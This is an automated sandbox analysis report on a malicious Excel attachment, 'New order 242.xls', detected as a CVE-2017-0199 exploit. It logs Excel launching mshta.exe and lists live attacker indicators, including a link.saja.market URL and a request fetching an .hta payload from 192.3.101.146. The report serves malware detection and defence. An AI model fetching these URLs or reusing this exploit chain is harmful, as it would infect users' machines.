Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49765
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49765
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49766
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49766
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49766
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49766
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49766
Source: excel.exeMemory has grown: Private usage: 1MB later: 166MB
Source: Joe Sandbox ViewIP Address: 3.39.153.44 3.39.153.44
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49764 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49765 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficHTTP traffic detected: GET /LUVLQ8X6l6?&peak=sour&eardrum HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: link.saja.marketConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/nice/niceskillgivenmebestskillforever.hta?&fragrance=plausible HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.101.146
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /LUVLQ8X6l6?&peak=sour&eardrum HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: link.saja.marketConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/nice/niceskillgivenmebestskillforever.hta?&fragrance=plausible HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.101.146
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: global trafficDNS traffic detected: DNS query: link.saja.market
Source: New order 242.xls, ~DFAD383C9BEA430960.TMP.16.drString found in binary or memory: https://link.saja.market/LUVLQ8X6l6?&peak=sour&eardrum
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownHTTPS traffic detected: 3.39.153.44:443 -> 192.168.2.12:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.12:49764 version: TLS 1.2

System Summary

barindex
Source: New order 242.xlsOLE: Microsoft Excel 2007+
Source: New order 242.xlsOLE: Microsoft Excel 2007+
Source: ~DFAD383C9BEA430960.TMP.16.drOLE: Microsoft Excel 2007+
Source: ~DFAD383C9BEA430960.TMP.16.drOLE: Microsoft Excel 2007+
Source: New order 242.xlsOLE indicator, VBA macros: true
Source: ~DFAD383C9BEA430960.TMP.16.drOLE indicator, VBA macros: true
Source: New order 242.xlsStream path 'MBD00CB8BBA/\x1Ole' : https://link.saja.market/LUVLQ8X6l6?&peak=sour&eardrum[%.vCL0R5Q#;`.F&pb#K`D?2|@-:Dl<T:~:^R;WnYRrBaaqp"y{N)/%athdk=>G9VLA9pz0feWpKZx0dS5ocblFoX8AGnn2plLGh6bHz1cNhSfijZlvCscgOd5siWLO68ggjHvnxt9sG0YMx0y3wyHJNlgrotJG96XHGUQvOgVh9Ysz7tlSZrG4mimSPcpmT/Ghn1@T5XIbb
Source: ~DFAD383C9BEA430960.TMP.16.drStream path 'MBD00CB8BBA/\x1Ole' : https://link.saja.market/LUVLQ8X6l6?&peak=sour&eardrum[%.vCL0R5Q#;`.F&pb#K`D?2|@-:Dl<T:~:^R;WnYRrBaaqp"y{N)/%athdk=>G9VLA9pz0feWpKZx0dS5ocblFoX8AGnn2plLGh6bHz1cNhSfijZlvCscgOd5siWLO68ggjHvnxt9sG0YMx0y3wyHJNlgrotJG96XHGUQvOgVh9Ysz7tlSZrG4mimSPcpmT/Ghn1@T5XIbb
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal60.expl.winXLS@6/4@3/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{BD3A4EE6-3DD4-4E88-8BC8-B4CAF9BD0C85} - OProcSessId.datJump to behavior
Source: New order 242.xlsOLE indicator, Workbook stream: true
Source: ~DFAD383C9BEA430960.TMP.16.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: New order 242.xlsVirustotal: Detection: 33%
Source: New order 242.xlsReversingLabs: Detection: 22%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\New order 242.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: New order 242.xlsStatic file information: File size 1172480 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: New order 242.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: New order 242.xlsStream path 'MBD00CB8BB9/MBD00320C7F/Package' entropy: 7.98905669124 (max. 8.0)
Source: New order 242.xlsStream path 'Workbook' entropy: 7.99157506457 (max. 8.0)
Source: ~DFAD383C9BEA430960.TMP.16.drStream path 'MBD00CB8BB9/MBD00320C7F/Package' entropy: 7.98905669124 (max. 8.0)
Source: ~DFAD383C9BEA430960.TMP.16.drStream path 'Workbook' entropy: 7.99157506457 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1189Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection		1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640395 Sample: New order 242.xls Startdate: 17/03/2025 Architecture: WINDOWS Score: 60 16 star-azurefd-prod.trafficmanager.net 2->16 18 shed.dual-low.s-part-0032.t-0009.t-msedge.net 2->18 20 9 other IPs or domains 2->20 28 Multi AV Scanner detection for submitted file 2->28 30 Excel sheet contains many unusual embedded objects 2->30 32 Document exploit detected (process start blacklist hit) 2->32 34 Sigma detected: Suspicious Microsoft Office Child Process 2->34 7 EXCEL.EXE 233 57 2->7         started        10 EXCEL.EXE 4 22 2->10         started        signatures3 process4 dnsIp5 22 s-part-0032.t-0009.t-msedge.net 13.107.246.60, 443, 49764, 49765 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->22 24 192.3.101.146, 49763, 80 AS-COLOCROSSINGUS United States 7->24 26 service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com 3.39.153.44, 443, 49762 AMAZONEXPANSIONGB United States 7->26 12 splwow64.exe 1 7->12         started        14 mshta.exe 7->14         started        process6

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
New order 242.xls33%VirustotalBrowse
New order 242.xls22%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://link.saja.market/LUVLQ8X6l6?&peak=sour&eardrum0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    		high
    s-part-0044.t-0009.fb-t-msedge.net
    		13.107.253.72
    		truefalse
      		high
      s-0005.dual-s-dc-msedge.net
      		52.123.131.14
      		truefalse
        		high
        service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com
        		3.39.153.44
        		truefalse
          		high
          s-part-0032.t-0009.t-msedge.net
          		13.107.246.60
          		truefalse
            		high
            otelrules.svc.static.microsoft
            		unknown
            		unknownfalse
              		high
              link.saja.market
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
                  		high
                  https://link.saja.market/LUVLQ8X6l6?&peak=sour&eardrumfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                    		high
                    https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      192.3.101.146
                      		unknownUnited States
                      		36352AS-COLOCROSSINGUSfalse
                      3.39.153.44
                      		service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.comUnited States
                      		8987AMAZONEXPANSIONGBfalse
                      13.107.246.60
                      		s-part-0032.t-0009.t-msedge.netUnited States
                      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                      General Information

                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1640395
                      Start date and time:2025-03-17 09:27:32 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 40s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:18
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • GSI enabled (VBA)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:New order 242.xls
                      Detection:MAL
                      Classification:mal60.expl.winXLS@6/4@3/3
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .xls
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
                      • Excluded IPs from analysis (whitelisted): 23.199.214.10, 52.109.32.97, 52.109.28.47, 199.232.210.172, 20.189.173.13, 104.208.16.95, 52.109.89.18, 52.123.131.14, 40.126.32.74, 20.109.210.53
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdcus20.centralus.cloudapp.azure.com, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, eur.roaming1.live.com.akadns.net, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ukw-azsc-config.officeapps.live.com, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, uks-azsc-000.roaming.officeapps.live.com, onedscolprdwus12.westus.cloudapp.azure.com, config.officeapps.live.com, ecs.office.trafficmanager.net, e
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Skipping SSL PCAP network analysis since amount of network traffic is too extensive
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      04:29:32API Interceptor1223x Sleep call for process: splwow64.exe modified

                      Joe Sandbox View / Context

